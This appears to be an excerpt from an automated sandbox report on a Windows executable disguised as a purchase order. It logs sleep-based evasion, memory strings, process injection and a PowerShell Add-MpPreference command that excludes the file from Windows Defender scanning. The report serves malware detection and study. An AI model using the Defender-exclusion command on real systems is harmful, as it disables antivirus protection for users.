Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -594141s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599589	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598782	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598657	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597247	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594141	Jump to behavior

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f06755b6c582a4<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8eac309876b74f9<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e4d54f02b11272
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f9d2a4b86df79f<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8edf75bfeda9c26<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e42653cf03ef89
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f1bb2cdc189bc3<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f6540e0ac4c402<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f2396214472603<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177902239.00000000061C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ec62573ca63491<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ef5db3292f915b<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ed82771ec7acd9<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f2af6564bcba17<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ed13f44211b99f<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8fa8d1df6635287<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e5d5f2dde2385f
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e6911d34a55386
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177902239.00000000061C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWvW
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e9ce35743de2f0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ef96d403494b1c<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ec0bc07cb4e305<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f593e62d7f03f7<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8eb35ac2142ca3d<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e36cc08b3ad46e
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e3cd13e847c67a
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f71f45874bf7b5<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e8a51f64ea9267
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8eba3c9ff184e47<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f01d68365bec94<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8eccdc6050420b9<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ee6229013bec1d<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f35ef436ae6d2d<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e52f8f5ac7755b
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f3a9d4c8e248d0<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e632bd227ff3ba
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e7a4c1c9b34190
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4166570008.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8ea396c74eead15
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e8178b7ce35ac3
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8eeee2af2d3a3ca<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e6f2b75e73a24c
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f0dde8ee198a06<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e58dc8b6b5f7a8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e95ead0e244faf
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f466f70c923bcf<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e7cc13caf20e04
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e475edd6fc1fb4
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f7e5b28c6459d0<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e90ddfd6da3a4a
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f13f24147285bd<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e86e0b310870a6
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8e74931e771a4ac
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f30807d3f43c07<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8f8ce9a52de3096<

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Memory written: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"			Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"			Jump to behavior

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXE
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXC
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxc
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxb
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXL
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXJ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8*
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8(
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8&
